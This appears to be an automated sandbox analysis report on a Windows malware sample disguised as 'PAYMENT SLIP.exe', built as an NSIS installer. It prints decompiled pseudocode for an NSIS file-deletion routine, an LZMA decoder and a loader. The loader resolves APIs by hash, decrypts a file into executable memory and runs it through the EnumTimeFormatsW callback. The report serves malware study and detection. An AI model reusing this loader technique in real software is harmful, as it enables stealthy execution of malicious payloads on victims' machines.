              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\PAYMENT SLIP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
              • API String ID: 3441113951-716424415
              • Opcode ID: 8ac029ab22eb7184ad5584a5e27cb41e00d28439acf5d8243c8b0e7e81677052
              • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
              • Opcode Fuzzy Hash: 8ac029ab22eb7184ad5584a5e27cb41e00d28439acf5d8243c8b0e7e81677052
              • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00405C4E(void* __eflags, signed int _a4, signed int _a8) {
              				signed int _v8;
              				signed int _v12;
              				short _v556;
              				short _v558;
              				struct _WIN32_FIND_DATAW _v604;
              				signed int _t38;
              				signed int _t52;
              				signed int _t55;
              				signed int _t62;
              				void* _t64;
              				signed char _t65;
              				WCHAR* _t66;
              				void* _t67;
              				WCHAR* _t68;
              				void* _t70;
              
              				_t65 = _a8;
              				_t68 = _a4;
              				_v8 = _t65 & 0x00000004;
              				_t38 = E00405F19(__eflags, _t68);
              				_v12 = _t38;
              				if((_t65 & 0x00000008) != 0) {
              					_t62 = DeleteFileW(_t68); // executed
              					asm("sbb eax, eax");
              					_t64 =  ~_t62 + 1;
              					 *0x42a308 =  *0x42a308 + _t64;
              					return _t64;
              				}
              				_a4 = _t65;
              				_t8 =  &_a4;
              				 *_t8 = _a4 & 0x00000001;
              				__eflags =  *_t8;
              				if( *_t8 == 0) {
              					L5:
              					E0040653C(0x425750, _t68);
              					__eflags = _a4;
              					if(_a4 == 0) {
              						E00405E5D(_t68);
              					} else {
              						lstrcatW(0x425750, L"\\*.*");
              					}
              					__eflags =  *_t68;
              					if( *_t68 != 0) {
              						L10:
              						lstrcatW(_t68, 0x40a014);
              						L11:
              						_t66 =  &(_t68[lstrlenW(_t68)]);
              						_t38 = FindFirstFileW(0x425750,  &_v604);
              						_t70 = _t38;
              						__eflags = _t70 - 0xffffffff;
              						if(_t70 == 0xffffffff) {
              							L26:
              							__eflags = _a4;
              							if(_a4 != 0) {
              								_t30 = _t66 - 2;
              								 *_t30 =  *(_t66 - 2) & 0x00000000;
              								__eflags =  *_t30;
              							}
              							goto L28;
              						} else {
              							goto L12;
              						}
              						do {
              							L12:
              							__eflags = _v604.cFileName - 0x2e;
              							if(_v604.cFileName != 0x2e) {
              								L16:
              								E0040653C(_t66,  &(_v604.cFileName));
              								__eflags = _v604.dwFileAttributes & 0x00000010;
              								if(__eflags == 0) {
              									_t52 = E00405C06(__eflags, _t68, _v8);
              									__eflags = _t52;
              									if(_t52 != 0) {
              										E004055A4(0xfffffff2, _t68);
              									} else {
              										__eflags = _v8 - _t52;
              										if(_v8 == _t52) {
              											 *0x42a308 =  *0x42a308 + 1;
              										} else {
              											E004055A4(0xfffffff1, _t68);
              											E00406302(_t67, _t68, 0);
              										}
              									}
              								} else {
              									__eflags = (_a8 & 0x00000003) - 3;
              									if(__eflags == 0) {
              										E00405C4E(__eflags, _t68, _a8);
              									}
              								}
              								goto L24;
              							}
              							__eflags = _v558;
              							if(_v558 == 0) {
              								goto L24;
              							}
              							__eflags = _v558 - 0x2e;
              							if(_v558 != 0x2e) {
              								goto L16;
              							}
              							__eflags = _v556;
              							if(_v556 == 0) {
              								goto L24;
              							}
              							goto L16;
              							L24:
              							_t55 = FindNextFileW(_t70,  &_v604);
              							__eflags = _t55;
              						} while (_t55 != 0);
              						_t38 = FindClose(_t70);
              						goto L26;
              					}
              					__eflags =  *0x425750 - 0x5c;
              					if( *0x425750 != 0x5c) {
              						goto L11;
              					}
              					goto L10;
              				} else {
              					__eflags = _t38;
              					if(_t38 == 0) {
              						L28:
              						__eflags = _a4;
              						if(_a4 == 0) {
              							L36:
              							return _t38;
              						}
              						__eflags = _v12;
              						if(_v12 != 0) {
              							_t38 = E0040689A(_t68);
              							__eflags = _t38;
              							if(_t38 == 0) {
              								goto L36;
              							}
              							E00405E11(_t68);
              							_t38 = E00405C06(__eflags, _t68, _v8 | 0x00000001);
              							__eflags = _t38;
              							if(_t38 != 0) {
              								return E004055A4(0xffffffe5, _t68);
              							}
              							__eflags = _v8;
              							if(_v8 == 0) {
              								goto L30;
              							}
              							E004055A4(0xfffffff1, _t68);
              							return E00406302(_t67, _t68, 0);
              						}
              						L30:
              						 *0x42a308 =  *0x42a308 + 1;
              						return _t38;
              					}
              					__eflags = _t65 & 0x00000002;
              					if((_t65 & 0x00000002) == 0) {
              						goto L28;
              					}
              					goto L5;
              				}
              			}

              APIs
              • DeleteFileW.KERNELBASE(?,?,73BCFAA0,73BCF560,00000000), ref: 00405C77
              • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405CE2
              • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CE8
              • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CF8
              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
              • FindClose.KERNEL32(00000000), ref: 00405DA7
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $PWB$\*.*
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E10001000(void* __eflags) {
              				long _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				short _v536;
              				intOrPtr* _t24;
              				void* _t33;
              				_Unknown_base(*)()* _t34;
              				int _t37;
              				void* _t43;
              				_Unknown_base(*)()* _t50;
              
              				_v8 = 0;
              				_t49 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
              				_v12 = E10001160( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8a111d91);
              				_t24 = E10001160( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xa4f84a9a);
              				_v16 = E10001160(_t49, 0x433a3842);
              				E10001160(_t49, 0xa5f15738);
              				 *((intOrPtr*)(E10001160(_t49, 0xcbec1a0)))();
              				 *_t24( &_v536, 0x10003000, 0x103,  &_v536);
              				_t33 = CreateFileW( &_v536, 0x80000000, 7, 0, 3, 0x80, 0);
              				_t34 = VirtualAlloc(0, 0x2605, 0x3000, 0x40); // executed
              				_t50 = _t34;
              				ReadFile(_t33, _t50, 0x2605,  &_v8, 0);
              				_t43 = 0;
              				if(_v8 > 0) {
              					do {
              						asm("rol al, 0x2");
              						asm("ror dl, 0x3");
              						 *((char*)(_t50 + _t43)) = (0x0000008b - ( *((intOrPtr*)(_t50 + _t43)) - _t43 ^ 0x000000af) - 0x0000000f + 0x0000006d ^ 0x000000ab) + _t43;
              						_t43 = _t43 + 1;
              					} while (_t43 < _v8);
              				}
              				_t37 = EnumTimeFormatsW(_t50, 0, 0); // executed
              				return _t37;
              			}

              APIs
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100010A4
              • VirtualAlloc.KERNELBASE(00000000,00002605,00003000,00000040), ref: 100010B7
              • ReadFile.KERNELBASE(00000000,00000000,00002605,00000000,00000000), ref: 100010C8
              • EnumTimeFormatsW.KERNELBASE(00000000,00000000,00000000), ref: 100010FB
              Memory Dump Source
              • Source File: 00000001.00000002.666317436.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
              • Associated: 00000001.00000002.666313199.0000000010000000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.666320964.0000000010002000.00000002.00020000.sdmp
              Similarity
              • API ID: File$AllocCreateEnumFormatsReadTimeVirtual
              • String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406C5B() {
              				unsigned short _t531;
              				signed int _t532;
              				void _t533;
              				void* _t534;
              				signed int _t535;
              				signed int _t565;
              				signed int _t568;
              				signed int _t590;
              				signed int* _t607;
              				void* _t614;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t614 - 0x40) != 0) {
              						 *(_t614 - 0x34) = 1;
              						 *(_t614 - 0x84) = 7;
              						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
              						L132:
              						 *(_t614 - 0x54) = _t607;
              						L133:
              						_t531 =  *_t607;
              						_t590 = _t531 & 0x0000ffff;
              						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
              						if( *(_t614 - 0xc) >= _t565) {
              							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
              							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
              							 *(_t614 - 0x40) = 1;
              							_t532 = _t531 - (_t531 >> 5);
              							 *_t607 = _t532;
              						} else {
              							 *(_t614 - 0x10) = _t565;
              							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
              							 *_t607 = (0x800 - _t590 >> 5) + _t531;
              						}
              						if( *(_t614 - 0x10) >= 0x1000000) {
              							L139:
              							_t533 =  *(_t614 - 0x84);
              							L140:
              							 *(_t614 - 0x88) = _t533;
              							goto L1;
              						} else {
              							L137:
              							if( *(_t614 - 0x6c) == 0) {
              								 *(_t614 - 0x88) = 5;
              								goto L170;
              							}
              							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
              							goto L139;
              						}
              					} else {
              						__eax =  *(__ebp - 0x5c) & 0x000000ff;
              						__esi =  *(__ebp - 0x60);
              						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              						__ecx =  *(__ebp - 0x3c);
              						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              						__ecx =  *(__ebp - 4);
              						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              						if( *(__ebp - 0x38) >= 4) {
              							if( *(__ebp - 0x38) >= 0xa) {
              								_t97 = __ebp - 0x38;
              								 *_t97 =  *(__ebp - 0x38) - 6;
              							} else {
              								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              							}
              						} else {
              							 *(__ebp - 0x38) = 0;
              						}
              						if( *(__ebp - 0x34) == __edx) {
              							__ebx = 0;
              							__ebx = 1;
              							L60:
              							__eax =  *(__ebp - 0x58);
              							__edx = __ebx + __ebx;
              							__ecx =  *(__ebp - 0x10);
              							__esi = __edx + __eax;
              							__ecx =  *(__ebp - 0x10) >> 0xb;
              							__ax =  *__esi;
              							 *(__ebp - 0x54) = __esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								_t216 = __edx + 1; // 0x1
              								__ebx = _t216;
              								__cx = __ax >> 5;
              								 *__esi = __ax;
              							} else {
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							 *(__ebp - 0x44) = __ebx;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								L59:
              								if(__ebx >= 0x100) {
              									goto L54;
              								}
              								goto L60;
              							} else {
              								L57:
              								if( *(__ebp - 0x6c) == 0) {
              									 *(__ebp - 0x88) = 0xf;
              									goto L170;
              								}
              								__ecx =  *(__ebp - 0x70);
              								__eax =  *(__ebp - 0xc);
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              								_t202 = __ebp - 0x70;
              								 *_t202 =  *(__ebp - 0x70) + 1;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              								goto L59;
              							}
              						} else {
              							__eax =  *(__ebp - 0x14);
              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              							if(__eax >=  *(__ebp - 0x74)) {
              								__eax = __eax +  *(__ebp - 0x74);
              							}
              							__ecx =  *(__ebp - 8);
              							__ebx = 0;
              							__ebx = 1;
              							__al =  *((intOrPtr*)(__eax + __ecx));
              							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              							L40:
              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              							__ecx =  *(__ebp - 0x58);
              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              							 *(__ebp - 0x48) = __eax;
              							__eax = __eax + 1;
              							__eax = __eax << 8;
              							__eax = __eax + __ebx;
              							__esi =  *(__ebp - 0x58) + __eax * 2;
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              							__ax =  *__esi;
              							 *(__ebp - 0x54) = __esi;
              							__edx = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								 *(__ebp - 0x40) = 1;
              								__cx = __ax >> 5;
              								__ebx = __ebx + __ebx + 1;
              								 *__esi = __ax;
              							} else {
              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edx;
              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							 *(__ebp - 0x44) = __ebx;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								L38:
              								__eax =  *(__ebp - 0x40);
              								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              									while(1) {
              										if(__ebx >= 0x100) {
              											break;
              										}
              										__eax =  *(__ebp - 0x58);
              										__edx = __ebx + __ebx;
              										__ecx =  *(__ebp - 0x10);
              										__esi = __edx + __eax;
              										__ecx =  *(__ebp - 0x10) >> 0xb;
              										__ax =  *__esi;
              										 *(__ebp - 0x54) = __esi;
              										__edi = __ax & 0x0000ffff;
              										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              										if( *(__ebp - 0xc) >= __ecx) {
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              											__cx = __ax;
              											_t169 = __edx + 1; // 0x1
              											__ebx = _t169;
              											__cx = __ax >> 5;
              											 *__esi = __ax;
              										} else {
              											 *(__ebp - 0x10) = __ecx;
              											0x800 = 0x800 - __edi;
              											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              											__ebx = __ebx + __ebx;
              											 *__esi = __cx;
              										}
              										 *(__ebp - 0x44) = __ebx;
              										if( *(__ebp - 0x10) < 0x1000000) {
              											L45:
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xe;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t155 = __ebp - 0x70;
              											 *_t155 =  *(__ebp - 0x70) + 1;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              										}
              									}
              									L53:
              									_t172 = __ebp - 0x34;
              									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
              									L54:
              									__al =  *(__ebp - 0x44);
              									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              									L55:
              									if( *(__ebp - 0x64) == 0) {
              										 *(__ebp - 0x88) = 0x1a;
              										goto L170;
              									}
              									__ecx =  *(__ebp - 0x68);
              									__al =  *(__ebp - 0x5c);
              									__edx =  *(__ebp - 8);
              									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              									 *( *(__ebp - 0x68)) = __al;
              									__ecx =  *(__ebp - 0x14);
              									 *(__ecx +  *(__ebp - 8)) = __al;
              									__eax = __ecx + 1;
              									__edx = 0;
              									_t191 = __eax %  *(__ebp - 0x74);
              									__eax = __eax /  *(__ebp - 0x74);
              									__edx = _t191;
              									L79:
              									 *(__ebp - 0x14) = __edx;
              									L80:
              									 *(__ebp - 0x88) = 2;
              									goto L1;
              								}
              								if(__ebx >= 0x100) {
              									goto L53;
              								}
              								goto L40;
              							} else {
              								L36:
              								if( *(__ebp - 0x6c) == 0) {
              									 *(__ebp - 0x88) = 0xd;
              									L170:
              									_t568 = 0x22;
              									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
              									_t535 = 0;
              									L172:
              									return _t535;
              								}
              								__ecx =  *(__ebp - 0x70);
              								__eax =  *(__ebp - 0xc);
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              								_t121 = __ebp - 0x70;
              								 *_t121 =  *(__ebp - 0x70) + 1;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              								goto L38;
              							}
              						}
              					}
              					L1:
              					_t534 =  *(_t614 - 0x88);
              					if(_t534 > 0x1c) {
              						L171:
              						_t535 = _t534 | 0xffffffff;
              						goto L172;
              					}
              					switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
              						case 0:
              							if( *(_t614 - 0x6c) == 0) {
              								goto L170;
              							}
              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
              							_t534 =  *( *(_t614 - 0x70));
              							if(_t534 > 0xe1) {
              								goto L171;
              							}
              							_t538 = _t534 & 0x000000ff;
              							_push(0x2d);
              							asm("cdq");
              							_pop(_t570);
              							_push(9);
              							_pop(_t571);
              							_t610 = _t538 / _t570;
              							_t540 = _t538 % _t570 & 0x000000ff;
              							asm("cdq");
              							_t605 = _t540 % _t571 & 0x000000ff;
              							 *(_t614 - 0x3c) = _t605;
              							 *(_t614 - 0x1c) = (1 << _t610) - 1;
              							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
              							_t613 = (0x300 << _t605 + _t610) + 0x736;
              							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
              								L10:
              								if(_t613 == 0) {
              									L12:
              									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
              									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
              									goto L15;
              								} else {
              									goto L11;
              								}
              								do {
              									L11:
              									_t613 = _t613 - 1;
              									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
              								} while (_t613 != 0);
              								goto L12;
              							}
              							if( *(_t614 - 4) != 0) {
              								GlobalFree( *(_t614 - 4));
              							}
              							_t534 = GlobalAlloc(0x40, 0x600); // executed
              							 *(_t614 - 4) = _t534;
              							if(_t534 == 0) {
              								goto L171;
              							} else {
              								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
              								goto L10;
              							}
              						case 1:
              							L13:
              							__eflags =  *(_t614 - 0x6c);
              							if( *(_t614 - 0x6c) == 0) {
              								 *(_t614 - 0x88) = 1;
              								goto L170;
              							}
              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
              							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
              							_t45 = _t614 - 0x48;
              							 *_t45 =  *(_t614 - 0x48) + 1;
              							__eflags =  *_t45;
              							L15:
              							if( *(_t614 - 0x48) < 4) {
              								goto L13;
              							}
              							_t546 =  *(_t614 - 0x40);
              							if(_t546 ==  *(_t614 - 0x74)) {
              								L20:
              								 *(_t614 - 0x48) = 5;
              								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
              								goto L23;
              							}
              							 *(_t614 - 0x74) = _t546;
              							if( *(_t614 - 8) != 0) {
              								GlobalFree( *(_t614 - 8));
              							}
              							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
              							 *(_t614 - 8) = _t534;
              							if(_t534 == 0) {
              								goto L171;
              							} else {
              								goto L20;
              							}
              						case 2:
              							L24:
              							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
              							 *(_t614 - 0x84) = 6;
              							 *(_t614 - 0x4c) = _t553;
              							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
              							goto L132;
              						case 3:
              							L21:
              							__eflags =  *(_t614 - 0x6c);
              							if( *(_t614 - 0x6c) == 0) {
              								 *(_t614 - 0x88) = 3;
              								goto L170;
              							}
              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
              							_t67 = _t614 - 0x70;
              							 *_t67 =  &(( *(_t614 - 0x70))[1]);
              							__eflags =  *_t67;
              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
              							L23:
              							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
              							if( *(_t614 - 0x48) != 0) {
              								goto L21;
              							}
              							goto L24;
              						case 4:
              							goto L133;
              						case 5:
              							goto L137;
              						case 6:
              							goto L0;
              						case 7:
              							__eflags =  *(__ebp - 0x40) - 1;
              							if( *(__ebp - 0x40) != 1) {
              								__eax =  *(__ebp - 0x24);
              								 *(__ebp - 0x80) = 0x16;
              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
              								__eax =  *(__ebp - 0x28);
              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
              								__eax =  *(__ebp - 0x2c);
              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              								__eax = 0;
              								__eflags =  *(__ebp - 0x38) - 7;
              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              								__al = __al & 0x000000fd;
              								__eax = (__eflags >= 0) - 1 + 0xa;
              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              								__eax =  *(__ebp - 4);
              								__eax =  *(__ebp - 4) + 0x664;
              								__eflags = __eax;
              								 *(__ebp - 0x58) = __eax;
              								goto L68;
              							}
              							__eax =  *(__ebp - 4);
              							__ecx =  *(__ebp - 0x38);
              							 *(__ebp - 0x84) = 8;
              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              							goto L132;
              						case 8:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x84) = 0xa;
              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              							} else {
              								__eax =  *(__ebp - 0x38);
              								__ecx =  *(__ebp - 4);
              								__eax =  *(__ebp - 0x38) + 0xf;
              								 *(__ebp - 0x84) = 9;
              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              							}
              							goto L132;
              						case 9:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								goto L89;
              							}
              							__eflags =  *(__ebp - 0x60);
              							if( *(__ebp - 0x60) == 0) {
              								goto L171;
              							}
              							__eax = 0;
              							__eflags =  *(__ebp - 0x38) - 7;
              							_t258 =  *(__ebp - 0x38) - 7 >= 0;
              							__eflags = _t258;
              							0 | _t258 = _t258 + _t258 + 9;
              							 *(__ebp - 0x38) = _t258 + _t258 + 9;
              							goto L75;
              						case 0xa:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x84) = 0xb;
              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x28);
              							goto L88;
              						case 0xb:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__ecx =  *(__ebp - 0x24);
              								__eax =  *(__ebp - 0x20);
              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
              							} else {
              								__eax =  *(__ebp - 0x24);
              							}
              							__ecx =  *(__ebp - 0x28);
              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
              							L88:
              							__ecx =  *(__ebp - 0x2c);
              							 *(__ebp - 0x2c) = __eax;
              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              							L89:
              							__eax =  *(__ebp - 4);
              							 *(__ebp - 0x80) = 0x15;
              							__eax =  *(__ebp - 4) + 0xa68;
              							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              							goto L68;
              						case 0xc:
              							L99:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xc;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t334 = __ebp - 0x70;
              							 *_t334 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t334;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							__eax =  *(__ebp - 0x2c);
              							goto L101;
              						case 0xd:
              							goto L36;
              						case 0xe:
              							goto L45;
              						case 0xf:
              							goto L57;
              						case 0x10:
              							L109:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0x10;
              								goto L170;
              							}
